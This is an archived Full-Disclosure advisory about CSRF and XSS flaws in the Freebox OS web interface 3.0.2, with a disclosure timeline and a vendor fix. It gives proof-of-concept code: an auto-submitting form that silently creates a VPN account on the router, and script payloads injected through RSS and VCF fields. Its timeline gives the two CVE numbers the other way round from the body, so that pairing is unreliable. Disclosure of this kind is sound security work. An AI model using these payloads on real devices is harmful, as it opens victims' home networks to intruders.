lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKniM0TgKfxnxhPQ4tKJy5QAhqtxN1en1UO9gQjBs4Tjdwu1VQ@mail.gmail.com>
Date: Mon, 1 Jun 2015 23:56:08 +0200
From: DAU Huy Ngoc <huyngocbk@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Freebox OS Web interface 3.0.2 XSS, CSRF

Hello list,

Here are two CVEs I reported to Freebox, a french ISP:
 - CVE-2014-9382 - CSRF in VPN user account creation
 - CVE-2014-9405 - XSS

Vulnerable product: Freebox OS Web interface 3.0.2.

CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user
account creation
====================
Risk level: High

Freebox allows users to create VPN connections to their home network.

In version 3.0.2 when a new user is created, the following JSON request is
sent to http://mafreebox.free.fr/api/v3/vpn/user/:

{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}

This request is vulnerable to CSRF which is easy to trigger.

The following POC would create a new VPN account "ngocdh" / "1234=5678":

<html>
  <body onload=vpn.submit()>
    <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/"
method="POST" enctype="text/plain">
      <input type="hidden"
name="&#123;&quot;login&quot;&#58;&quot;ngocdh&quot;&#44;&quot;password&#95;set&quot;&#58;false&#44;&quot;ip&#95;reservation&quot;&#58;&quot;&quot;&#44;&quot;password&quot;&#58;&quot;1234"
value="5678&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
====================
Risk level: low

Two XSS instances with low probability of exploitation were found in the
following places:
- Download RSS
- Contacts

The following POC demonstrates the XSS in the "description" field of a
Download RSS item:

<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>From Huy Ngoc</title>
<description>huyngocbk@...il.com</description>
<link>http://google.com</link>
<atom:link rel="hub" href="http://google.com"/>
<atom:link rel="self" href="http://google.com"/>
     <item>
        <title>Test by huyngoc</title><description><![CDATA[<img src=/
onerror="alert(document.domain)">]]></description>
        <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>
        <guid>http://google.com></guid>
     </item>
</channel>
</rss>

In order to exploit this XSS, the attacker must control a RSS feed to which
a user have subscribed.


The following VCF file demonstrates a XSS exploitation POC,
"alert(document.domain)" would be called after importing this VCF file from
the web interface:

BEGIN:VCARD
VERSION:3.0
FN:DAU Huy Ngoc
N:;;;;
URL:<img src=/ onerror='alert(document.domain);'>
END:VCARD

In order to exploit this XSS, the attacker must trick a user into importing
his malicious .vcf.


Timeline:
21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)

Credit: DAU Huy Ngoc (@ngocdh)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ